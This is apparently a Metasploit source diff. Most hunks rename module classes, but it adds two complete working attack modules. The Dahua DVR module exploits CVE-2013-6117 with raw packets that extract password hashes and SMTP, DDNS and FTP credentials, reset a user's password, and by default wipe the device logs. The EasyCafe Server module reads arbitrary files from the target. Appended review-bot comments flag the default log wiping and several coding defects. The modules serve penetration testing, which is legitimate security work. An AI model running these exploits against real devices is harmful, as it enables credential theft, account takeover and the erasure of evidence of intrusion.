@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary ) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way.") + vprint_error("Server did not respond in an expected way.") return end @@ -81,9 +81,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") + vprint_error("Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") end end end diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 78e9e72086..736f5256b9 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', 
@@ -116,25 +116,25 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") - vprint_status("#{peer} - Trying to download filepath.") + vprint_status("Trying to download filepath.") file_path = down_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error downloading filepath.") + print_error("Error downloading filepath.") return end @@ -164,9 +164,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") + print_error("Nothing was downloaded. You can try to change the FILEPATH.") end end end diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 4c6f1bcdfe..8ebe785795 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/yaws_traversal.rb b/modules/auxiliary/scanner/http/yaws_traversal.rb index 26e8aa1815..7947f768c2 100644 --- a/modules/auxiliary/scanner/http/yaws_traversal.rb +++ b/modules/auxiliary/scanner/http/yaws_traversal.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index 878b786208..16256268f9 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/zabbix' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb index c50a870fe7..c950811aa6 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index 095f3b2717..c17adaf2b9 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 74ff3e3e3f..9999280be5 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb 
+++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Imap include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index aa3e1a9244..206908b32f 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'timeout' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index abc8d604bd..a8e64e9258 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index c6d1f16d8e..6627284b08 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index 0c497970b6..ca209d0b99 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/kademlia/server_info.rb b/modules/auxiliary/scanner/kademlia/server_info.rb index 0f1c4508df..2eaf5ce94b 100644 --- a/modules/auxiliary/scanner/kademlia/server_info.rb +++ b/modules/auxiliary/scanner/kademlia/server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Kademlia diff --git a/modules/auxiliary/scanner/llmnr/query.rb b/modules/auxiliary/scanner/llmnr/query.rb index 74a8687efb..a09506761e 100644 --- a/modules/auxiliary/scanner/llmnr/query.rb +++ b/modules/auxiliary/scanner/llmnr/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::LLMNR diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 19a35e271d..7c4b0c7d2c 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index c3e9ac94a5..ba3eef232a 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 6df88ba9ee..f0c187ef91 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mdns/query.rb b/modules/auxiliary/scanner/mdns/query.rb index 4412818e31..507192479f 100644 --- a/modules/auxiliary/scanner/mdns/query.rb +++ b/modules/auxiliary/scanner/mdns/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::MDNS diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 2a1337914a..bede37a4c5 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb new file mode 100644 index 0000000000..c2a0551cab --- /dev/null +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb 
@@ -0,0 +1,394 @@ +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => %q(Dahua DVR Auth Bypass Scanner), + 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), + 'Author' => [ + 'Tyler Bennett - Talos Consulting', # Metasploit module + 'Jake Reynolds - Depth Security', # Vulnerability Discoverer + 'Jon Hart ', # improved metasploit module + 'Nathan McBride' # regex extraordinaire + ], + 'References' => [ + [ 'CVE', '2013-6117' ], + [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] + ], + 'License' => MSF_LICENSE, + 'DefaultAction' => 'VERSION', + 'Actions' => + [ + [ 'CHANNEL', { 'Description' => 'Obtain the channel/camera information from the DVR' } ], + [ 'DDNS', { 'Description' => 'Obtain the DDNS settings from the DVR' } ], + [ 'EMAIL', { 'Description' => 'Obtain the email settings from the DVR' } ], + [ 'GROUP', { 'Description' => 'Obtain the group information the DVR' } ], + [ 'NAS', { 'Description' => 'Obtain the NAS settings from the DVR' } ], + [ 'RESET', { 'Description' => 'Reset an existing user\'s password on the DVR' } ], + [ 'SERIAL', { 'Description' => 'Obtain the serial number from the DVR' } ], + [ 'USER', { 'Description' => 'Obtain the user information from the DVR' } ], + [ 'VERSION', { 'Description' => 'Obtain the version of the DVR' } ] + ] + ) + + deregister_options('RHOST') + register_options([ + OptString.new('USERNAME', [false, 'A username to reset', '888888']), + OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), + OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]), + Opt::RPORT(37777) + ]) + end + + U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00" + # Payload to grab version of the DVR + VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab Email Settings of the DVR + EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab DDNS Settings of the DVR + DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab NAS Settings of the DVR + NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Channels that each camera is assigned to on the DVR + CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users Groups of the DVR + GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users and their hashes from the DVR + USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Serial Number of the DVR + SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to clear the logs of the DVR + CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ + 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + def setup + @password = datastore['PASSWORD'] + @password ||= Rex::Text.rand_text_alpha(6) + end + + def grab_version + connect + sock.put(VERSION) + data = sock.get_once + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + ver = Regexp.last_match[1] + print_good("#{peer} -- version: #{ver}") + end + + def grab_serial + connect + sock.put(SN) + data = sock.get_once + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + serial = Regexp.last_match[1] + print_good("#{peer} -- serial number: #{serial}") + end + + def grab_email + connect + sock.put(EMAIL) + return unless (response = sock.get_once) + data = response.split('&&') + print_good("#{peer} -- Email Settings:") + return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i + if mailhost = Regexp.last_match[1].split(':') + print_status("#{peer} -- Server: #{mailhost[0]}") unless mailhost[0].blank? + print_status("#{peer} -- Server Port: #{mailhost[1]}") unless mailhost[1].blank? + print_status("#{peer} -- Destination Email: #{data[1]}") unless data[1].blank? + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" + muser = "#{data[5]}" + mpass = "#{data[6]}" + end + return if muser.blank? && mpass.blank? + print_good(" SMTP User: #{data[5]}") + print_good(" SMTP Password: #{data[6]}") + return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? 
+ report_email_cred(mailserver, mailport, muser, mpass) + end + + def grab_ddns + connect + sock.put(DDNS) + return unless (response = sock.get_once) + data = response.split(/&&[0-1]&&/) + ddns_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua DDNS Settings', + 'Indent' => 1, + 'Columns' => ['Peer', 'DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] + ) + data.each_with_index do |val, index| + next if index == 0 + val = val.split("&&") + ddns_service = val[0] + ddns_server = val[1] + ddns_port = val[2] + ddns_domain = val[3] + ddns_user = val[4] + ddns_pass = val[5] + ddns_table << [ peer, ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] + unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? + if datastore['VERBOSE'] + ddns_table.print + end + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + end + end + end + + def grab_nas + connect + sock.put(NAS) + return unless (data = sock.get_once) + print_good("#{peer} -- NAS Settings:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = Regexp.last_match[1].unpack('C*').join('.') + port = Regexp.last_match[2].unpack('S') + end + if /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ =~ data + ftpuser.strip! + ftppass.strip! + unless ftpuser.blank? || ftppass.blank? 
+ print_good("#{peer} -- NAS Server: #{server}") + print_good("#{peer} -- NAS Port: #{port}") + print_good("#{peer} -- FTP User: #{ftpuser}") + print_good("#{peer} -- FTP Pass: #{ftppass}") + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) + end + end + end + + def grab_channels + connect + sock.put(CHANNELS) + data = sock.get_once.split('&&') + channels_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Camera Channels', + 'Indent' => 1, + 'Columns' => ['ID', 'Peer', 'Channels'] + ) + return unless data.length > 1 + data.each_with_index do |val, index| + number = index.to_s + channels = val[/([[:print:]]+)/] + channels_table << [ number, peer, channels ] + end + channels_table.print + end + + def grab_users + connect + sock.put(USERS) + return unless (response = sock.get_once) + data = response.split('&&') + usercount = 0 + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Users Hashes and Rights', + 'Indent' => 1, + 'Columns' => ['Peer', 'Username', 'Password Hash', 'Groups', 'Permissions', 'Description'] + ) + data.each do |val| + usercount += 1 + user, md5hash, groups, rights, name = val.match(/^.*:(.*):(.*):(.*):(.*):(.*):(.*)$/).captures + users_table << [ peer, user, md5hash, groups, rights, name] + # Write the dahua hash to the database + hash = "#{rhost} #{user}:$dahua$#{md5hash}" + report_hash(rhost, rport, user, hash) + # Write the vulnerability to the database + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{user}: #{md5hash}", + refs: references + ) + end + users_table.print + end + + def grab_groups + connect + sock.put(GROUPS) + return unless (response = sock.get_once) + data = response.split('&&') + groups_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua groups', + 'Indent' => 1, + 'Columns' => ['ID', 'Peer', 'Group'] + ) + data.each do |val| + 
number = "#{val[/(([\d]+))/]}" + groups = "#{val[/(([a-z]+))/]}" + groups_table << [ number, peer, groups ] + end + groups_table.print + end + + def reset_user + connect + userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring + sock.put(u1) + sock.put(u2) + sock.put(u3) + sock.get_once + sock.put(u1) + return unless sock.get_once + print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") + end + + def clear_logs + connect + sock.put(CLEAR_LOGS1) + sock.put(CLEAR_LOGS2) + print_good("#{peer} -- logs cleared") + end + + def peer + "#{rhost}:#{rport}" + end + + def run_host(_ip) + begin + connect + sock.put(U1) + data = sock.recv(8) + disconnect + return unless data == DVR_RESP + print_good("#{peer} -- Dahua-based DVR found") + report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") + + case action.name.upcase + when 'CHANNEL' + grab_channels + when 'DDNS' + grab_ddns + when 'EMAIL' + grab_email + when 'GROUP' + grab_groups + when 'NAS' + grab_nas + when 'RESET' + reset_user + when 'SERIAL' + grab_serial + when 'USER' + grab_users + when 'VERSION' + grab_version + end + + clear_logs if datastore['CLEAR_LOGS'] + ensure + disconnect + end + end + + def report_hash(rhost, rport, user, hash) + service_data = { + address: rhost, + port: rport, + service_name: 'dahua_dvr', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: hash, + 
private_type: :nonreplayable_hash, + jtr_format: 'dahua_hash', + username: user + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + service_data = { + address: ddns_server, + port: ddns_port, + service_name: 'ddns settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: ddns_pass, + private_type: :password, + username: ddns_user + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_email_cred(mailserver, mailport, muser, mpass) + service_data = { + address: mailserver, + port: mailport, + service_name: 'email settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: mpass, + private_type: :password, + username: muser + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end +end diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index c497a8ff3d..4d5b3fa724 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
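Review bot: `CLEAR_LOGS` is registered with a default of `true` in dahua_dvr_auth_bypass.rb, and `run_host` runs `clear_logs if datastore['CLEAR_LOGS']` after every action, so even the default `VERSION` action erases the device's logs. A scanner should not destroy audit data unless the operator asks for it; I would register it as `OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), false])`. In `grab_email` the last guard, `return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank?`, is inverted: together with the earlier `return if muser.blank? && mpass.blank?` it always returns, so `report_email_cred` is unreachable. `grab_channels` calls `sock.get_once.split('&&')` without the nil check the other `grab_*` methods have, and `grab_users` calls `.captures` on a `match` result that is nil for any record that does not fit the pattern; both raise NoMethodError on a timeout or an unexpected reply.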
diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb new file mode 100644 index 0000000000..b16a4cfc06 --- /dev/null +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb 
@@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyCafe Server Remote File Access', + 'Description' => %q{ + This module exploits a file retrieval vulnerability in + EasyCafe Server. The vulnerability can be triggered by + sending a specially crafted packet (opcode 0x43) to the + 831/TCP port. + This module has been successfully tested on EasyCafe Server + version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 + and Windows 7 SP1. + Note that the server will throw a popup messagebox if the + specified file does not exist. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'R-73eN', # Vulnerability Discovery + 'Brendan Coles ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '39102' ] + ] + )) + + register_options( + [ + Opt::RPORT(831), + OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']) + ], self.class) + end + + def get_file + res = sock.get_once + unless res + print_error("Unable to retrieve file due to a timeout.") + return + end + + unless res.length == 261 + print_error("Received a response of an invalid size.") + return + end + + file_size = res.unpack('@256V')[0] + contents = '' + while contents.length < file_size + contents << sock.get_once + end + + print_status("File retrieved successfully (#{contents.length} bytes)!") + contents + end + + def run_host(ip) + file_path = datastore['FILEPATH'] + if file_path.length > 67 + print_error("File path is longer than 67 characters. 
Try using MS-DOS 8.3 short file names.") + return + end + + packet = "\x43" + packet << file_path + packet << "\x00" * (255 - file_path.length) + packet << "\x01\x00\x00\x00\x01" + + vprint_status("Sending request (#{packet.length} bytes)") + connect + sock.put(packet) + + contents = get_file + disconnect + return if contents.nil? + + path = store_loot( + 'easycafe_server', + 'application/octet-stream', + ip, + contents, + File.basename(file_path) + ) + print_status("File saved in: #{path}") + end +end diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index e50e477f5e..c0a7fc5418 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ead12ac27a..7601687f18 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Auxiliary::Scanner 
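Review bot: In `get_file` of easycafe_server_fileaccess.rb the read loop `contents << sock.get_once` trusts the peer completely: `file_size` is taken from the response (`res.unpack('@256V')[0]`) with no upper bound, and a nil from `sock.get_once` (which the method itself treats as a timeout a few lines earlier) makes `<<` raise TypeError. Any host answering on the scanned port with a large declared size can therefore make the scanner buffer up to 4 GiB in memory, and a stalled transfer ends in an exception instead of the error path. I would read into a local (`chunk = sock.get_once`), call `print_error` and `return` when `chunk.nil?`, and reject a `file_size` above a sane limit before entering the loop. `run_host` also calls `disconnect` only on the success path, so an exception in `get_file` leaves the socket open; a `begin`/`ensure` around the body with `disconnect` in the `ensure` fixes that.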
